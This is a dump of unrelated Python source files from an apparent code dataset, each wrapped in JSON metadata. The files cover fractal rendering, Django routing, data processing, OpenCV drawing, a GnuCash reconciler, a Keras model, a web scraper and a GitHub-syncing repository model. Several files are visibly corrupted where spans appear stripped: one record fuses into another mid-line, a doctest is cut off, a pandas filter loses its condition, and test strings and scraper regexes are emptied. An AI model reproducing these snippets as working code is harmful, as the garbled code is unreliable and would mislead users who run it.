dfs(dist,startR,startC,to,cnt):\r\n global ans\r\n\r\n if ans<=dist:\r\n return\r\n #print(dist, startR, startC, to, cnt)\r\n #두개다 찾았으면\r\n if cnt==2:\r\n if dist vcenter - axrng:\r\n\t\ty-= vstep\r\n\t\tx = hcenter - axrng\r\n\t\twhile x < hcenter + axrng:\r\n\t\t\tx+= hstep\r\n\t\t\t\t\r\n\t\t\tn = 0\r\n\t\t\ta = complex(x,y)\r\n\t\t\t\r\n\t\t\t# n < 100 is the number of iterations\r\n\t\t\t# Increase this value to show finer detail\r\n\t\t\t# Decrease the value if nothing shows on the screen\r\n\t\t\twhile n < 200:\r\n\t\t\t\tn+=1 \r\n\t\t\t\ta = a**3 + z\r\n\t\t\t\tzz = abs(a)\r\n\t\t\t\tif zz > 2:\r\n\t\t\t\t\tglColor3f(cos(zz),sin(zz)*cos(zz),sin(zz))\r\n\t\t\t\t\tglVertex2f(x,y)\r\n\t\t\t\t\tn = 5001\r\n\t\t\tif zz < 200:\r\n\t\t\t\tglColor3f(tan(zz),sin(zz),cos(n))\t\r\n\t\t\t\tglVertex2f(x,y) \r\n\r\n\r\n\tglEnd()\r\n\tglFlush()\r\n\t\t\t\r\ndef main():\r\n\tglutInitDisplayMode(GLUT_RGB | GLUT_SINGLE)\r\n\tglutInitWindowPosition(50, 50)\r\n\tglutInitWindowSize(width, height)\r\n\tglutInit(sys.argv)\r\n\tglutCreateWindow(\"Julia Set\")\r\n\tglutDisplayFunc(drawjulia)\r\n\tinit()\r\n\tglutMainLoop()\r\n\t\r\nmain()\r\n\r\n# End Program\t\r\n","sub_path":"Python_Programming_in_OpenGL_Blank/PyExpJulia.py","file_name":"PyExpJulia.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"67365323","text":"from django.contrib import admin\nfrom django.urls import path, include\n\nurlpatterns = [\n path('', include('app.urls')),\n path(r'app/', include('app.urls')),\n path(r'api/', include('api.urls')),\n path(r'accounts/', include('django_registration.backends.activation.urls')),\n path(r'accounts/', include('django.contrib.auth.urls')),\n path('darposht/', admin.site.urls),\n]\n","sub_path":"website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"440500351","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/pyams_utils/decorator.py\n# Compiled at: 2020-02-18 19:11:13\n# Size of source mod 2**32: 2207 bytes\n__doc__ = 'PyAMS_utils.decorator module\\n\\nThis module only provides a single decorator, which can be used to mark a function as\\ndeprecated.\\n'\nimport functools, warnings\n__docformat__ = 'restructuredtext'\n\ndef deprecated(*msg):\n r\"\"\"This is a decorator which can be used to mark functions as deprecated.\n\n It will result in a warning being emitted when the function is used.\n\n >>> from pyams_utils.context import capture_stderr\n >>> from pyams_utils.decorator import deprecated\n\n >>> @deprecated\n ... def my_function(value):\n ... return value\n\n >>> with capture_stderr(my_function, 1) as err:\n ... print(err.split('\\n')[0])\n >> @deprecated('Deprecation message')\n ... def my_function_2(value):\n ... return value\n\n >>> with capture_stderr(my_function_2, 2) as err:\n ... print(err.split('\\n')[0])\n =2015] #limit to year >= 2015\n \n df_filt = df_filt.filter(['scenario','region','landleaf','year','value_profit','Units_profit'])\n \n #split up landleaf into crop, basin, irrigation or rainfed\n df_filt[['crop','basin','ww_type','hi_lo']] = df_filt.landleaf.str.rsplit('_',3,expand=True)\n \n #limit to just basins in LAC\n df_filt = df_filt[(df_filt.basin.isin(lac_basins_short)) & (~(df_filt.basin.isin(['California','UsaColoRS'])))]\n #rename water basins appropriately\n df_filt.basin = df_filt.basin.map(short_to_long)\n\n #limit land type to just crops\n crop_list = ['Corn','FiberCrop','FodderGrass','FodderHerb','MiscCrop','OilCrop',\n 'OtherGrain','Rice','Root_Tuber','SugarCrop','Wheat','PalmFruit']\n df_filt = df_filt[df_filt.crop.isin(crop_list)]\n \n #filter scenario name out into parameters\n df_filt = scen_columns(df_filt)\n \n #save profit data (by crop) - may need this later\n savepath = '/cluster/tufts/lamontagnelab/abirnb01/Paper1/GCAM_queries/query_results/final_results/crop_profit'\n isdir = os.path.isdir(savepath) \n if not isdir:\n os.mkdir(savepath)\n \n df_filt.to_csv(savepath+'/'+db+'_profit.csv')\n \n #now sum up across crops to get basin net profit\n \n #save profit sum data\n savepath = '/cluster/tufts/lamontagnelab/abirnb01/Paper1/GCAM_queries/query_results/final_results/crop_profit_sum'\n isdir = os.path.isdir(savepath) \n if not isdir:\n os.mkdir(savepath)\n \n #sum across region, landleaf, crop, ww_type, hi_lo (get total crop profit for basin)\n df_sum = df_filt.groupby(['scenario','year','basin','tax','ssp','ag','soc','esm','res','gw'])['value_profit'].sum()\n df_sum = df_sum.reset_index()\n df_sum['Units_profit'] = '$1975'\n df_sum = df_sum.set_index('scenario')\n \n #save as csv\n df_sum.to_csv(savepath+'/'+db+'_profit_sum.csv')\n \n#Now sum up crop profit sums across databases to get single pickle file that contains it for all of the databases\nquery = 'crop_profit_sum'\nnewpath = '/cluster/tufts/lamontagnelab/abirnb01/Paper1/GCAM_queries/query_results/final_results/'\nos.chdir(newpath+query)\nos.getcwd()\n\nextension = 'csv'\nall_filenames = [i for i in glob.glob('*.{}'.format(extension))]\ncombined_csv = pd.concat([pd.read_csv(f) for f in all_filenames[:]])\n\ncombined_csv.to_pickle('/cluster/tufts/lamontagnelab/abirnb01/GCAM_queries/query_results/final_results/pickle_data/'+query)\n","sub_path":"scripts/query_scripts/processing_queries/profit_import.py","file_name":"profit_import.py","file_ext":"py","file_size_in_byte":8117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"592014021","text":"import numpy as np\nimport cv2\n\nimg= cv2.imread('a.png', cv2.IMREAD_COLOR) #read it in as color\n\ncv2.line(img, (0,0), (150,150), (255,255,255), 15) #where line starts and ends and color of line (blue,green,red), line width = 15 px\ncv2.rectangle(img, (15,25), (200,150), (0,255,0), 5) #where rectangle starts and ends\ncv2.circle(img, (100,63), 55,(0,0,255), -1) #-1 will fill in the image with the color. center , radius, color, \n#Polygon. Will connect points and optionally close polygon.\n\npts = np.array([[10,5], [20,30], [70,20], [50,10]], np.int32) #datatype\npts=pts.reshape((-1,1,2)) #opencv documentation suggests to convert array to 1x2\n\ncv2.polylines(img, [pts], True, (0,255,255), 3 ) #TRue is whether or not we want to connect final point to first point...color, line-width\n\n#now...writing.\n#FONT\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncv2.putText(img, 'OpenCV TUTS!', (0,130), font, 10, (200,255,255), 2, cv2.LINE_AA) #starting, font, size\n#color, thickness.., \n\n\ncv2.imshow('image', img)\ncv2.waitKey(0) #for any key to be pressed\ncv2.destroyAllWindows()","sub_path":"drawingonimage_basics.py","file_name":"drawingonimage_basics.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"82616257","text":"from typing import List, Dict\nfrom piecash import Split\nimport datetime\nimport warnings\n\nclass Reconciler:\n\n def __init__(self, split_candidates: List[Split]):\n self.split_candidates: Dict[datetime.date, Split] = {} \n for split in split_candidates:\n\n if not split.transaction.post_date in self.split_candidates:\n self.split_candidates[split.transaction.post_date] = {split.value: [split]}\n continue\n\n value2split = self.split_candidates[split.transaction.post_date]\n\n if not split.value in value2split:\n value2split[split.value] = [split]\n continue\n\n value2split[split.value].append(split) \n\n def reconcile(self, date, price):\n \"\"\"Try to reconcile the splits and return the result. If success, mark the split.\n Reconciliation succeed if there is a split with the same date and the same price.\n \"\"\"\n \n if date in self.split_candidates and price in self.split_candidates[date]:\n splits = self.split_candidates[date][price]\n if len(splits) > 1 and splits[-2].reconcile_state != \"y\":\n warnings.warn(f\"There exists unreconciled split with the same date and the value in { splits[-1].transaction.description}. Reconciliation may be inaccurate.\")\n # Only mark the last one as reconciled.\n if splits[-1].reconcile_state != \"y\":\n splits[-1].reconcile_state = \"c\"\n return True\n else:\n return False","sub_path":"gnucash_csv_importer/reconciler.py","file_name":"reconciler.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"351023071","text":"import csv\n\ndef importtriangle(file):\n csv.QUOTE_NONNUMERIC\n triangle = []\n with open(file) as datafile:\n reader = csv.reader(datafile, delimiter=' ')\n for row in reader:\n n=0\n for x in row:\n row[n] = int(x)\n n+=1\n triangle.append(row)\n return(triangle) \n # print(','.join(row))\n\n\ndef findpath(triangle):\n x= len(triangle)\n for row in range(x-1,0,-1):\n for col in range(len(triangle[row-1])):\n if (triangle[row][col] > triangle[row][col+1]):\n triangle[row-1][col] += triangle[row][col]\n else:\n triangle[row-1][col] += triangle[row][col+1]\n return triangle\n\nif (__name__ == \"__main__\"):\n triangle = importtriangle(\"p067_triangle.txt\")\n trysumed = findpath(triangle)\n print(trysumed[0])","sub_path":"Euler/sixties/maxpath.py","file_name":"maxpath.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"618254965","text":"# coding=utf-8\n# Copyright 2018 Salesforce and HuggingFace Inc. team.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport os\nimport unittest\n\nfrom transformers.models.bertweet.tokenization_bertweet import VOCAB_FILES_NAMES, BertweetTokenizer\n\nfrom ...test_tokenization_common import TokenizerTesterMixin\n\n\nclass BertweetTokenizationTest(TokenizerTesterMixin, unittest.TestCase):\n tokenizer_class = BertweetTokenizer\n test_rust_tokenizer = False\n\n def setUp(self):\n super().setUp()\n\n # Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt\n vocab = [\"I\", \"m\", \"V@@\", \"R@@\", \"r\", \"e@@\"]\n vocab_tokens = dict(zip(vocab, range(len(vocab))))\n merges = [\"#version: 0.2\", \"a m\"]\n self.special_tokens_map = {\"unk_token\": \"\"}\n\n self.vocab_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES[\"vocab_file\"])\n self.merges_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES[\"merges_file\"])\n with open(self.vocab_file, \"w\", encoding=\"utf-8\") as fp:\n for token in vocab_tokens:\n fp.write(f\"{token} {vocab_tokens[token]}\\n\")\n with open(self.merges_file, \"w\", encoding=\"utf-8\") as fp:\n fp.write(\"\\n\".join(merges))\n\n def get_tokenizer(self, **kwargs):\n kwargs.update(self.special_tokens_map)\n return BertweetTokenizer.from_pretrained(self.tmpdirname, **kwargs)\n\n def get_input_output_texts(self, tokenizer):\n input_text = \"I am VinAI Research\"\n output_text = \"I m V I Re e \"\n return input_text, output_text\n\n def test_full_tokenizer(self):\n tokenizer = BertweetTokenizer(self.vocab_file, self.merges_file, **self.special_tokens_map)\n text = \"I am VinAI Research\"\n bpe_tokens = \"I a@@ m V@@ i@@ n@@ A@@ I R@@ e@@ s@@ e@@ a@@ r@@ c@@ h\".split()\n tokens = tokenizer.tokenize(text)\n self.assertListEqual(tokens, bpe_tokens)\n\n input_tokens = tokens + [tokenizer.unk_token]\n\n input_bpe_tokens = [4, 3, 5, 6, 3, 3, 3, 4, 7, 9, 3, 9, 3, 3, 3, 3, 3]\n self.assertListEqual(tokenizer.convert_tokens_to_ids(input_tokens), input_bpe_tokens)\n","sub_path":"tests/models/bertweet/test_tokenization_bertweet.py","file_name":"test_tokenization_bertweet.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"317631651","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import StandardScaler\n\ndata = pd.read_csv('data/breastcancer.csv')\n# Select rows with particular indices and particular columns\nx = data.iloc[:, [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 31]]\n# LabelEncoder() used to normalize labels.\nlabel = LabelEncoder()\n# Fit label encoder and return encoded labels with diagnosis\ndata['d'] = label.fit_transform(data['diagnosis'].astype('str'))\ny = data['d']\n\nX_train, X_test, Y_train, Y_test = train_test_split(x, y, test_size=0.25, random_state=87)\n# scale the data\nscale = StandardScaler()\nX_train = scale.fit_transform(X_train)\nX_test = scale.transform(X_test)\n\nnp.random.seed(155)\nmy_first_nn = Sequential() # create a sequential model\nmy_first_nn.add(Dense(30, input_dim=29, activation='relu')) # hidden layer\nmy_first_nn.add(Dense(1, activation='sigmoid')) # output layer\nmy_first_nn.compile(loss='binary_crossentropy', optimizer='adam', metrics=[\"accuracy\"])\nmy_first_nn_fitted = my_first_nn.fit(X_train, Y_train, epochs=100, verbose=0, initial_epoch=0)\n\nprint(my_first_nn.summary())\nprint(my_first_nn.evaluate(X_test, Y_test, verbose=0))\n","sub_path":"DL-ICP1/normalize-standard-scaler.py","file_name":"normalize-standard-scaler.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"605573297","text":"# -*- coding: UTF-8 -*-\n\nimport requests\nimport re\n\nroots = ['https://www.21ks.net/lunwen/dljslw/',\n 'https://www.21ks.net/lunwen/dljslw/List_4.html',\n 'https://www.21ks.net/lunwen/dljslw/List_3.html',\n 'https://www.21ks.net/lunwen/dljslw/List_2.html',\n 'https://www.21ks.net/lunwen/dljslw/List_1.html']\n\nhead = {'User-Agent':'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36'}\ndir = '/Users/mac/Desktop/毕设/webspider/'\n\ndef func():\n # 加载论文源网页\n addi = []\n fileCounts = 1\n for root in roots:\n html = requests.get(root, headers=head)\n html.encoding = \"GB2312\"\n sites = re.findall('
    (.*?)
    ', html.text, re.S)\n for site in sites:\n # print(site)\n s = re.findall('', site, re.S)\n for ss in s:\n addi.append(ss)\n # 加载论文\n for site in addi:\n html = requests.get(site, headers=head)\n html.encoding = \"GB2312\"\n label = re.findall('

    (.*?)

    ', html.text, re.S)\n\n fileName = dir + str(fileCounts) + '.txt'\n doc = open(fileName, 'w')\n print('file counts:%d'%(fileCounts))\n\n for each in label:\n raw = each.lstrip().rstrip();\n pattern = re.compile(r'<[^>]+>', re.S)\n result = pattern.sub('', raw)\n print(result, file=doc)\n\n doc.close()\n fileCounts = fileCounts + 1\n\n\nif __name__ == '__main__':\n func()","sub_path":"src/webspider.py","file_name":"webspider.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"624966279","text":"# -*- coding: utf-8 -*-\nfrom tori.decorator.controller import renderer\nfrom council.common.handler import Controller\n\n@renderer('council.view')\nclass Home(Controller):\n def get(self):\n if not self.authenticated:\n return self.redirect('/login')\n elif not self.authenticated.active:\n return self.redirect('/me')\n\n self.render('index.html', js_module_name='Index')\n\n@renderer('council.view')\nclass Login(Controller):\n def get(self):\n if self.authenticated:\n return self.redirect('/')\n\n self.render('login.html', js_module_name='Login')","sub_path":"council/council/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"303585468","text":"# -*- coding: utf-8 -*-\nimport MySQLdb\n\n\n\ndef GetTitle(Id):\n\n #ローカルMySQLを使用\n connection = MySQLdb.connect(db = \"wiki\", user = \"root\")\n cursor = connection.cursor()\n\n cursor.execute(\"select * from page where page_id=\" + str(Id) + \" and page_namespace=0\")\n result = cursor.fetchall()\n\n #titleを返す\n if(len(result) > 0):\n return result[0][2]\n\n return ''\n","sub_path":"課題1-1/GetTitleFromIdApi.py","file_name":"GetTitleFromIdApi.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"185390400","text":"# Copyright 2018 Jetperch LLC\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nThis executable captures the raw USB stream from Joulescope devices\nand saves the raw stream data to a file. This executable is a\ndevelopment tool and is not intended for customer use.\n\"\"\"\n\nfrom joulescope_ui.main import run\nfrom joulescope_ui.logging_util import LEVELS\n\n\nNAME = \"ui\"\n\n\ndef parser_config(p):\n \"\"\"Start the Joulescope graphical user interface\"\"\"\n p.add_argument('filename',\n default=None,\n nargs='?',\n help='The optional filename to display immediately')\n p.add_argument('--device_name',\n help='The device name to search [joulescope]')\n p.add_argument('--console_log_level', '--log_level',\n choices=list(LEVELS.keys()),\n help='The console (stdout) log level.')\n p.add_argument('--file_log_level',\n choices=list(LEVELS.keys()),\n help='The file log level.')\n return on_cmd\n\n\ndef on_cmd(args):\n return run(device_name=args.device_name,\n log_level=args.console_log_level,\n file_log_level=args.file_log_level,\n filename=args.filename)\n","sub_path":"joulescope_ui/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"351611770","text":"#!/usr/bin/python3\n\"\"\"THis module contains the function to find the perimeter of an island\n\"\"\"\n\n\ndef island_perimeter(grid):\n \"\"\"Function to find the perimeter of a island\n Args:\n grid (list of lists): Contains the \"map\" of the island\n Returns:\n int: Perimeter of such island\n \"\"\"\n peri = 0\n for x in range(len(grid)):\n for y in range(len(grid[x])):\n if grid[x][y] == 1:\n if y + 1 >= len(grid[x]) or grid[x][y + 1] == 0:\n peri += 1\n if y - 1 < 0 or grid[x][y - 1] == 0:\n peri += 1\n if x + 1 >= len(grid) or grid[x + 1][y] == 0:\n peri += 1\n if x - 1 < 0 or grid[x - 1][y] == 0:\n peri += 1\n return peri\n","sub_path":"0x1C-makefiles/5-island_perimeter.py","file_name":"5-island_perimeter.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"368243610","text":"\"\"\"\nCopyright (c) 2013 Shotgun Software, Inc\n----------------------------------------------------\n\n\"\"\"\nimport os\nimport hiero.core\n\nfrom tank import Hook\nfrom tank import TankError\n\nclass SceneOperation(Hook):\n \"\"\"\n Hook called to perform an operation with the\n current scene\n \"\"\"\n \n def execute(self, operation, file_path, context, **kwargs):\n \"\"\"\n Main hook entry point\n \n :operation: String\n Scene operation to perform\n \n :file_path: String\n File path to use if the operation\n requires it (e.g. open)\n \n :context: Context\n The context the file operation is being\n performed in.\n \n :returns: Depends on operation:\n 'current_path' - Return the current scene\n file path as a String\n 'reset' - True if scene was reset to an empty \n state, otherwise False\n all others - None\n \"\"\"\n\n if operation == \"current_path\":\n # return the current script path\n project = self._get_current_project()\n curr_path = project.path().replace(\"/\", os.path.sep)\n return curr_path\n\n elif operation == \"open\":\n # open the specified script\n hiero.core.openProject(file_path.replace(os.path.sep, \"/\"))\n \n elif operation == \"save\":\n # save the current script:\n project = self._get_current_project()\n project.save()\n \n elif operation == \"save_as\":\n project = self._get_current_project()\n project.saveAs(file_path.replace(os.path.sep, \"/\"))\n\n elif operation == \"reset\":\n # do nothing and indicate scene was reset to empty\n return True\n \n elif operation == \"prepare_new\":\n # add a new project to hiero\n hiero.core.newProject()\n \n\n def _get_current_project(self):\n \"\"\"\n Returns the current project based on where in the UI the user clicked \n \"\"\"\n \n # get the menu selection from hiero engine\n selection = self.parent.engine.get_menu_selection()\n\n if len(selection) != 1:\n raise TankError(\"Please select a single Project!\")\n \n if not isinstance(selection[0] , hiero.core.Bin):\n raise TankError(\"Please select a Hiero Project!\")\n \n project = selection[0].project()\n if project is None:\n # apparently bins can be without projects (child bins I think)\n raise TankError(\"Please select a Hiero Project!\")\n \n return project\n","sub_path":"tank_dev/install/apps/tk-multi-workfiles/v0.3.3/hooks/scene_operation_tk-hiero.py","file_name":"scene_operation_tk-hiero.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"80899489","text":"import heapq\n\nN, M = map(int, input().split())\n\nboard = []\nfor _ in range(N):\n board.append(input())\n\nmx = [0, 0, -1, 1]\nmy = [-1, 1, 0, 0]\n\nq = [(1, 0, 0, 0)]\nvisit_0 = [[0]*M for _ in range(N)]\nvisit_1 = [[0]*M for _ in range(N)]\nvisit_0[0][0] = 1\n\nanswer = 0\nwhile q:\n c, b, x, y = heapq.heappop(q)\n if x == N-1 and y == M-1:\n answer = c\n break\n\n for i in range(4):\n nx = x + mx[i]\n ny = y + my[i]\n\n if 0<=nx and nx now:\n try:\n column.fetch_cards(gh, force_fetch=force_fetch)\n except ApiError:\n # Currently Github raise a 500 when asking for the second page of cards\n # We want to continue to fetch cards of other columns\n pass\n # now manage card that disappeared from any column\n from gim.core.models import Card\n cards_to_delete = Card.objects.filter(column__project=project, github_status=Card.GITHUB_STATUS_CHOICES.ERROR_FETCHED)\n for card in cards_to_delete:\n card.delete()\n\n except Exception:\n # Next time we'll refetch all. Else we won't be able to get new data if\n # the error occured for example while fetching cards: the fetch of the\n # project would have returned 304, so no more fetch\n self.projects_fetched_at = None\n self.save(update_fields=['projects_fetched_at'])\n raise\n\n @property\n def github_callable_identifiers_for_protected_branches(self):\n return self.github_callable_identifiers + [\n 'branches',\n ]\n\n def fetch_protected_branches(self, gh, force_fetch=False, parameters=None, max_pages=None):\n if parameters is None:\n parameters = {}\n parameters['protected'] = 1\n with Token.manage_gh_if_404(gh):\n return self._fetch_many('protected_branches', gh,\n defaults={\n 'fk': {'repository': self},\n 'related': {'*': {'fk': {'repository': self}}},\n },\n force_fetch=force_fetch,\n parameters=parameters,\n max_pages=max_pages)\n\n def fetch_all_protected_branches(self, gh, force_fetch=False):\n # only admins can fetch protected branches :(\n token = Token.get_for_gh(gh)\n if not token.repos_admin.sismember(self.pk):\n token = Token.get_one_for_repository(self.pk, 'admin')\n if token:\n gh = token.gh\n else:\n return\n\n if not force_fetch:\n if not self.protected_branches_fetched_at:\n force_fetch = True\n try:\n self.fetch_protected_branches(gh, force_fetch=force_fetch)\n for branch in self.protected_branches.all():\n branch.fetch_all(gh, force_fetch=force_fetch)\n except Exception:\n # Next time we'll refetch all. Else we won't be able to get new data\n self.protected_branches_fetched_at = None\n self.save(update_fields=['protected_branches_fetched_at'])\n raise\n\n @property\n def github_callable_identifiers_for_git_heads(self):\n return self.github_callable_identifiers_for_git_data + [\n 'refs',\n 'heads',\n ]\n\n def fetch_git_heads(self, gh, force_fetch=False, parameters=None, max_pages=None):\n with Token.manage_gh_if_404(gh):\n return self._fetch_many('git_heads', gh,\n defaults={\n 'fk': {'repository': self},\n 'related': {'*': {'fk': {'repository': self}}},\n },\n force_fetch=force_fetch,\n parameters=parameters,\n max_pages=max_pages)\n\n def fetch_minimal(self, gh, force_fetch=False, **kwargs):\n if not self.fetch_minimal_done:\n force_fetch = True\n self.fetch(gh, force_fetch=force_fetch)\n\n current_first_fetch_ongoing = get_first_fetch_ongoing()\n\n # If it was None, we let it None\n # If it was -1, it's because we just create the repository, so we always use the pk.\n with toggle_first_fetch_ongoing(self.pk if current_first_fetch_ongoing else None,\n revert_when_done=current_first_fetch_ongoing != -1):\n\n self.fetch_labels(gh, force_fetch=force_fetch)\n self.fetch_milestones(gh, force_fetch=force_fetch)\n if not self.fetch_minimal_done:\n self.fetch_minimal_done = True\n self.save(update_fields=['fetch_minimal_done'])\n\n def fetch(self, gh, defaults=None, force_fetch=False, parameters=None, meta_base_name=None, github_api_version=None):\n with Token.manage_gh_if_404(gh):\n return super(Repository, self).fetch(gh, defaults, force_fetch, parameters, meta_base_name, github_api_version)\n\n def fetch_all(self, gh, force_fetch=False, **kwargs):\n \"\"\"\n Pass \"two_steps=True\" to delay fetch of closed issues and comments (by\n adding a FirstFetchStep2 job that will call fetch_all_step2)\n \"\"\"\n\n with toggle_first_fetch_ongoing(None if self.first_fetch_step2_done else (self.pk or -1)): # -1 if no pk yet\n two_steps = bool(kwargs.get('two_steps', False))\n\n self.fetch_minimal(gh, force_fetch=force_fetch)\n self.fetch_all_protected_branches(gh, force_fetch=force_fetch)\n self.fetch_git_heads(gh, force_fetch=force_fetch)\n\n if two_steps:\n self.fetch_issues(gh, force_fetch=force_fetch, state='open')\n from gim.core.tasks.repository import FirstFetchStep2\n FirstFetchStep2.add_job(self.id)\n else:\n self.fetch_all_step2(gh, force_fetch)\n from gim.core.tasks.project import FetchProjects\n FetchProjects.add_job(self.id)\n from gim.core.tasks.repository import FetchUnmergedPullRequests\n FetchUnmergedPullRequests.add_job(self.id, priority=-15, delayed_for=60*60*3) # 3 hours\n\n if not self.first_fetch_done:\n self.first_fetch_done = True\n self.save(update_fields=['first_fetch_done'])\n\n def fetch_all_step2(self, gh, force_fetch=False, start_page=None,\n max_pages=None, to_ignore=None, issues_state=None):\n # projects are fetched separately\n\n with toggle_first_fetch_ongoing(None if self.first_fetch_step2_done else self.pk):\n if not to_ignore:\n to_ignore = set()\n\n parameters = {}\n if start_page and start_page > 1:\n parameters['page'] = start_page\n\n kwargs = {\n 'gh': gh,\n 'force_fetch': force_fetch,\n 'max_pages': max_pages,\n 'parameters': parameters,\n }\n\n counts = {}\n\n if 'issues' not in to_ignore:\n counts['issues'] = self.fetch_issues(parameters_prs=parameters,\n state=issues_state, **kwargs)\n if 'issues_events' not in to_ignore:\n counts['issues_events'] = self.fetch_issues_events(**kwargs)\n if 'comments' not in to_ignore:\n counts['comments'] = self.fetch_comments(**kwargs)\n if 'pr_comments' not in to_ignore:\n counts['pr_comments'] = self.fetch_pr_comments(**kwargs)\n if 'commit_comments' not in to_ignore:\n counts['commit_comments'] = self.fetch_commit_comments(**kwargs)\n\n return counts\n\n @cached_property\n def has_some_projects(self):\n return self.has_projects and self.projects.exists()\n\n @property\n def has_some_projects_with_issues(self):\n from .projects import CARDTYPE\n return self.has_projects and self.projects.filter(columns__cards__type=CARDTYPE.ISSUE).exists()\n\n GRAPHQL_FETCH_REVIEWS = compose_query(\n # language=graphql\n \"\"\"\n query RepositoryPullRequestsReviews($nbReviewsToRetrieve: Int = 30, $nextReviewsPageCursor: String) {\n %s\n }\n \"\"\", 'pullRequestReviewsFull')\n\n # language=graphql\n GRAPHQL_FETCH_REVIEWS_PR_SUBQUERY = \"\"\"\n node%(pr_id)s: node(id: \"%(pr_idb64)s\") {\n ...pullRequestReviewsFull\n }\n \"\"\"\n\n GRAPHQL_FETCH_ALL_REVIEWS = compose_query(\n # language=graphql\n \"\"\"\n query RepositoryAllPullRequestsReviews($repositoryOwnerLogin: String!, $repositoryName: String!, $nbPullRequestsToRetrieve: Int = 30, $nbReviewsToRetrieve: Int = 30, $nextPullRequestsPageCursor: String, $nextReviewsPageCursor: String) {\n repository(owner:$repositoryOwnerLogin, name:$repositoryName) {\n pullRequests(last: $nbPullRequestsToRetrieve, before: $nextPullRequestsPageCursor) {\n pageInfo {\n ...pageInfoPrevious\n }\n edges {\n node {\n ...pullRequestNumber\n ...pullRequestReviewsFull\n }\n }\n }\n }\n }\n \"\"\", 'pageInfoPrevious', 'pullRequestNumber', 'pullRequestReviewsFull')\n\n GRAPHQL_FETCH_ALL_REVIEWS_LITE = compose_query(\n # language=graphql\n \"\"\"\n query RepositoryAllPullRequestsReviewsLite($repositoryOwnerLogin: String!, $repositoryName: String!, $nbPullRequestsToRetrieve: Int = 30, $nextPullRequestsPageCursor: String) {\n repository(owner:$repositoryOwnerLogin, name:$repositoryName) {\n pullRequests(last: $nbPullRequestsToRetrieve, before: $nextPullRequestsPageCursor) {\n pageInfo {\n ...pageInfoPrevious\n }\n edges {\n node {\n ...pullRequestNumber\n }\n }\n }\n }\n }\n \"\"\", 'pageInfoPrevious', 'pullRequestNumber')\n\n def _manage_pr_reviews_from_fetch(self, gh, pr, reviews_node):\n from gim.core.models import PullRequestReview\n\n if reviews_node and reviews_node.get('edges'):\n\n objs = PullRequestReview.objects.create_or_update_from_list(\n [edge.node for edge in reviews_node.edges],\n defaults={'fk': {'issue': pr}},\n )\n\n # continue fetching the reviews for this issue if more than one page\n has_next_page = reviews_node.pageInfo.hasNextPage\n if has_next_page:\n objs += pr.fetch_pr_reviews(gh, reviews_node.pageInfo.endCursor, False)\n\n # we're done\n pr.pr_reviews_fetched_at = datetime.utcnow()\n pr.save(update_fields=['pr_reviews_fetched_at'])\n\n def fetch_all_pr_reviews(self, gh, next_page_cursor=None, max_prs=None):\n\n from 